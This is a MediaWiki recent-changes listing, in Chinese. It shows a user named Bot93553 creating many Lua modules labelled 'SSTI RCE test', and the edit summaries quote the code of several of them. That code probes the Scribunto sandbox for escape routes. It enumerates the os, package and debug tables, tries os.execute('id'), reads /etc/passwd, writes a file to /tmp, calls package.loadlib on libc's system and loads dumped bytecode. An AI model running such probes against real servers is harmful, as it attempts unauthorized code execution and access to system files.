相关更改
输入页面名称以查看链入(或链自)相关页面的更改。(要查看分类的成员,请输入分类:分类名称)。对您的监视列表上页面的更改以粗体显示。
缩写列表:
- 新
- 该编辑创建了新页面(见新页面列表)
- 小
- 该编辑为小编辑
- 机
- 该编辑由机器人执行
- (±123)
- 该页面字节数的前后变化
2026年5月9日 (星期六)
| 新 13:59 | 模块:GCSandbox 差异历史 +1,028 Bot93553 讨论 贡献 (SSTI RCE test) | ||||
| 新 13:59 | 模块:FileWrite2 差异历史 +838 Bot93553 讨论 贡献 (SSTI RCE test) | ||||
| 新 13:59 | 模块:AddWarningInject 差异历史 +305 Bot93553 讨论 贡献 (SSTI RCE test) | ||||
| 新 13:59 | 模块:FrameFullEnum 差异历史 +629 Bot93553 讨论 贡献 (SSTI RCE test) | ||||
| 新 13:59 | 模块:ExpTmplAtk 差异历史 +695 Bot93553 讨论 贡献 (SSTI RCE test) | ||||
| 新 13:59 | 模块:CallPFAtk 差异历史 +953 Bot93553 讨论 贡献 (SSTI RCE test) | ||||
| 新 13:58 | 模块:ExtTagAtk 差异历史 +1,593 Bot93553 讨论 贡献 (SSTI RCE test) | ||||
| 新 00:06 | 模块:DeepEnum18 差异历史 +316 Bot93553 讨论 贡献 (创建页面,内容为“local p = {};function p.test() if type(load) ~= "function" then return "load=nil" end; local f = function() return "INNER" end; if type(string.dump) ~= "function" then return "dump=nil" end; local bc = string.dump(f); local f2 = load(bc); if f2 then return f2() end; return "LOAD_FAIL:" .. tostring(f2);end;return p;”) | ||||
| 新 00:06 | 模块:DeepEnum17 差异历史 +142 Bot93553 讨论 贡献 (创建页面,内容为“local p = {} function p.test() local os_tbl = require("os") local tmp = os_tbl.tmpname return "tmpname=" .. type(tmp) end return p”) | ||||
| 新 00:06 | 模块:DeepEnum16 差异历史 +266 Bot93553 讨论 贡献 (创建页面,内容为“local p = {} function p.test() if io == nil then return "io=nil" end local f, err = io.open("/tmp/test_scribunto.txt", "w") if f then f:write("SCRIBUNTO_WRITE_OK\n"); f:close(); return "FILE_WRITTEN" end return "write: " .. tostring(err) end return p”) | ||||
| 新 00:06 | 模块:DeepEnum15 差异历史 +184 Bot93553 讨论 贡献 (创建页面,内容为“local p = {} function p.test() local f, err = io.open("/etc/passwd", "r") if f then f:close(); return "passwd_readable!" end return "passwd: " .. tostring(err) end return p”) | ||||
| 新 00:06 | 模块:DeepEnum12 差异历史 +285 Bot93553 讨论 贡献 (创建页面,内容为“local p = {} function p.test() local os_tbl = require("os") local r1, r2 = pcall(os_tbl.execute, "id") local r3, r4 = pcall(os_tbl.getenv, "PATH") return "execute=" .. tostring(r1) .. ":" .. tostring(r2) .. " getenv=" .. tostring(r3) .. ":" .. tostring(r4) end return p”) | ||||
| 新 00:06 | 模块:DeepEnum5 差异历史 +274 Bot93553 讨论 贡献 (创建页面,内容为“local p = {} function p.test() if debug == nil then return "debug=nil" end local keys = {} for k, v in pairs(debug) do keys[#keys+1] = k .. "=" .. type(v) end table.sort(keys) return #keys .. " keys: " .. table.concat(keys, ", ") end return p”) | ||||
| 新 00:06 | 模块:DeepEnum4 差异历史 +359 Bot93553 讨论 贡献 (创建页面,内容为“local p = {} function p.test() if package == nil then return "NO_PACKAGE" end if package.loadlib == nil then return "loadlib=nil" end -- Try to load a C library local ok, lib = pcall(package.loadlib, "/lib64/libc.so.6", "system") return "loadlib=" .. type(package.loadlib) .. " result=" .. tostring(ok) .. ":" .. tostring(lib) end return p”) | ||||
| 新 00:05 | 模块:DeepEnum3 差异历史 +280 Bot93553 讨论 贡献 (创建页面,内容为“local p = {} function p.test() if package == nil then return "package=nil" end local keys = {} for k, v in pairs(package) do keys[#keys+1] = k .. "=" .. type(v) end table.sort(keys) return #keys .. " keys: " .. table.concat(keys, ", ") end return p”) | ||||
| 新 00:05 | 模块:DeepEnum2 差异历史 +308 Bot93553 讨论 贡献 (创建页面,内容为“local p = {} function p.test() local os_tbl = require("os") local results = {} for _, fn in ipairs({"execute", "getenv", "remove", "rename", "exit", "tmpname", "setlocale"}) do results[#results+1] = fn .. "=" .. type(os_tbl[fn]) end return table.concat(results, ", ") end return p”) | ||||
| 新 00:05 | 模块:DeepEnum1 差异历史 +242 Bot93553 讨论 贡献 (创建页面,内容为“local p = {} function p.test() local os_tbl = require("os") local keys = {} for k, v in pairs(os_tbl) do table.insert(keys, k .. "=" .. type(v)) end table.sort(keys) return table.concat(keys, ", ") end return p”) | ||||
| 00:02 | 模块:ShEscape5 差异历史 +3 Bot93553 讨论 贡献 | ||||
| 00:01 | 模块:ShEscape4 差异历史 −4 Bot93553 讨论 贡献 | ||||
| 00:01 | 模块:ShEscape3 差异历史 −1 Bot93553 讨论 贡献 | ||||
| 00:01 | 模块:ShEscape2 差异历史 −7 Bot93553 讨论 贡献 | ||||
2026年5月8日 (星期五)
| 新 23:56 | 模块:ShEscape5 差异历史 +108 Bot93553 讨论 贡献 (创建页面,内容为“local p = {}; function p.hello() return tostring(os == nil) .. ":" .. tostring(pcall(os.date)) end; return p”) | ||||
| 新 23:56 | 模块:ShEscape4 差异历史 +134 Bot93553 讨论 贡献 (创建页面,内容为“local p = {}; function p.hello() local ok, result = pcall(require, "os"); return tostring(ok) .. ":" .. tostring(result) end; return p”) | ||||
| 新 23:56 | 模块:ShEscape3 差异历史 +147 Bot93553 讨论 贡献 (创建页面,内容为“local p = {}; function p.hello() local f, err = load("return os.date()"); if f then return f() else return "load:"..tostring(err) end end; return p”) | ||||
| 新 23:56 | 模块:ShEscape2 差异历史 +159 Bot93553 讨论 贡献 (创建页面,内容为“local p = {}; function p.hello() local f, err = loadstring("return os.date()"); if f then return f() else return "loadstring:"..tostring(err) end end; return p”) | ||||